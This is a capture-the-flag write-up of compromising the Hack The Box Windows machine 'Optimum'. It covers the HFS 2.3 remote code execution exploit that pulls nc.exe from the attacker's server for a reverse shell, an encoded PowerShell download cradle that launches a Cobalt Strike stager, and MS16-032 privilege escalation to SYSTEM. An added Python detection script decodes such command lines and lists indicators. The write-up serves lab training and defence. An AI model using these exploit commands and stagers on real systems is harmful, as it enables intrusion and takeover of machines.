Optimum is a Windows machine, with an average difficulty rating of “piece of cake”.

HttpFileServer RCE

After an nmap scan we see that port 80 is open, running HttpFileServer version 2.3.

➜  Optimum nmap -n -A 10.10.10.8 -oA nmap
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

A quick search in Exploit-DB (EDB) shows that there are a few exploits available.

➜  Optimum searchsploit "http file server" 2.3
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                             |  Path
                                                                                                                                                           | (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                             | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                        | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                        | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                   | windows/webapps/34852.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

39161 looks promising, so copy it to the current working directory using searchsploit's -m (mirror) option.

➜  Optimum searchsploit -m 39161
➜  Optimum vim 39161.py 

The basic premise of this exploit is that it sends a specific HTTP request to the application, which causes it to download nc.exe from a web server we control and then execute it to send us a shell.

We have to modify it to work with our IP address, which is set on line 35: ip_addr = "192.168.44.128". In my case, this needs to be 10.10.14.5.

We also need to copy nc.exe into the current directory and start a web server to serve it from.

➜  Optimum cp /usr/share/windows-binaries/nc.exe .

➜  Optimum python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Next, we set up our listener to receive the reverse shell.

➜  Optimum nc -lnvp 443
listening on [any] 443 ...

Then run the exploit.

➜  Optimum python 39161.py 10.10.10.8 80

All being well, you will see the target issue some GET requests for nc.exe against our web server.

10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] "GET /nc.exe HTTP/1.1" 200 -

And receive a shell.

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.8] 49204
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>

User Flag

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

Priv Esc

To make post-exploitation easier, I prefer to spawn a Cobalt Strike Beacon. The following PowerShell one-liner will run a stager. start /B will background the job; if you don't do this, PowerShell will hang the shell, and ctrl+c will kill netcat, forcing you to exploit all over again.

C:\Users\kostas\Desktop>start /B powershell.exe -nop -w hidden -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA1AC8AYQAiACkAKQA=
*** initial beacon from [email protected] (OPTIMUM)
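On the defender's side, the -enc argument above is exactly what a process-creation record (Sysmon Event ID 1, EDR command-line telemetry) captures, and the payload is base64 over UTF-16LE rather than plain ASCII. The following Python is added here and is not part of the original writeup or of Cobalt Strike: it decodes such a command line and flags the download-and-execute primitives this stager relies on. The sample command line is the one from this writeup; the helper names and the indicator list are my own.

```python
import base64
import re
import shlex
from typing import Optional

# Constructed sample: the Beacon stager command line from this writeup, as a
# Sysmon Event ID 1 / EDR process-creation record would capture it.
SAMPLE_CMDLINE = (
    "powershell.exe -nop -w hidden -enc "
    "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBu"
    "AHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAA"
    "LgAxADAALgAxADQALgA1AC8AYQAiACkAKQA="
)

# Download-and-execute primitives a stager of this shape relies on (my own list).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "net.webclient", "invoke-webrequest", "frombase64string")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line uses -EncodedCommand.

    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec,
    -enc, ...), and the argument is base64 over UTF-16LE, so decoding it as
    ASCII yields NUL-separated garbage; decode as utf-16-le instead.
    """
    tokens = shlex.split(cmdline, posix=False)
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) >= 2 and tok[0] in "-/" and "encodedcommand".startswith(tok[1:].lower()):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # bad padding or charset: not a real -enc payload
    return None


def triage(cmdline: str) -> dict:
    """Decode the command line and report which download/execute primitives it calls."""
    decoded = extract_encoded_command(cmdline) or ""
    lowered = decoded.lower()
    hits = [s for s in SUSPICIOUS if s in lowered]
    urls = re.findall(r"""https?://[^\s"')]+""", decoded)
    return {"decoded": decoded, "indicators": hits, "urls": urls,
            "verdict": "stager-like" if hits and urls else "review"}


if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

The decoded script is the classic download cradle, and the URL it pulls from is the listener the writeup stood up, which is the indicator you would pivot on in proxy or DNS logs.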

set pro lists the environment variables beginning with "pro", which is a quick way to see whether we're running on 32-bit or 64-bit Windows: PROCESSOR_ARCHITECTURE shows the architecture of the current process, and the presence of PROCESSOR_ARCHITEW6432 shows that it is a 32-bit process on a 64-bit OS.

beacon> shell set pro

PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G

I’m going to use my Sherlock script to look for missing MS patches, but that currently needs to run in a 64-bit process (if you’re on a 64-bit OS of course).

beacon> spawn x64 smb

Now, we can load the script into memory and run the Find-AllVulns function.

beacon> powershell-import D:\Tools\Sherlock\Sherlock.ps1
beacon> powershell Find-AllVulns

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Sherlock comes back with two missing patches. MS16-032 is a particular favourite of mine, so let's aim for that one. It exploits a race condition, which requires the host to have at least 2 CPU cores; Sherlock doesn't currently validate this requirement, so we must check manually.

beacon> shell wmic cpu get NumberOfCores, NumberOfLogicalProcessors /Format:List

NumberOfCores=2
NumberOfLogicalProcessors=2

Looks good, so let's run the exploit.

I have the exploit integrated into Cobalt Strike via Aggressor Script, which makes this easy :)

beacon> elevate ms16-032 smb

[+] established link to child beacon: 10.10.10.8
[+] received output:
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!

Root Flag

beacon> shell type C:\Users\Administrator\Desktop\root.txt
51ed1b36553c8461f4552c2e92b3eeed